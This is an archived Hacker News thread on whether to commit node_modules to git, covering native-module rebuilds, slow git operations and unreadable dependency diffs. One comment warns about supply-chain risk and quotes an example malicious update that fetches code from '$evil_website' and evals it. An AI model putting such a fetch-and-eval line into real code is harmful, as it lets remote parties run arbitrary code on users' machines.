undefined | Better HN

mschuster918y ago· 2 in thread

Does not work as soon as you use node modules that come with native components that have to be recompiled for the machine, and there are many of these.

Colleagues have been bitten by this - one used OS X 10.11, the other 10.12, and they experienced weird bugs from this. Went away once they kicked out node_modules from git.

tomjakubowski8y ago

Yeah, it’s an annoying problem. Maybe you could gitignore the *.node (the native module file extension) files only. But I’m not sure how you’d rebuild those “on demand” after a checkout without running 'npm install' from the top level.

nawitus8y ago

I suppose npm rebuild would work.

zbentley8y ago

That has some advantages, but some really big drawbacks as well:

- Incredibly slow git operations unless you use the perfect options every time (good luck, new devs).

- Requires either very good discipline about updating just a few packages at a time (good luck when cascading dependencies that are shared at multiple levels of the tree update), or incredibly huge, confusing diffs to read.

- Actually understanding the diffs you read. Packages updated to do things like 'http.get("$evil_website", (r) => eval(r))' are only a tiny fraction of the malicious or dangerous code you'll see in package updates.

matharmin8y ago

This was the officially recommended solution for long, but suffers from a few issues. Most notably for me is that pull requests that change any dependencies become impossible to read (on github at least).

0 comments

0 comments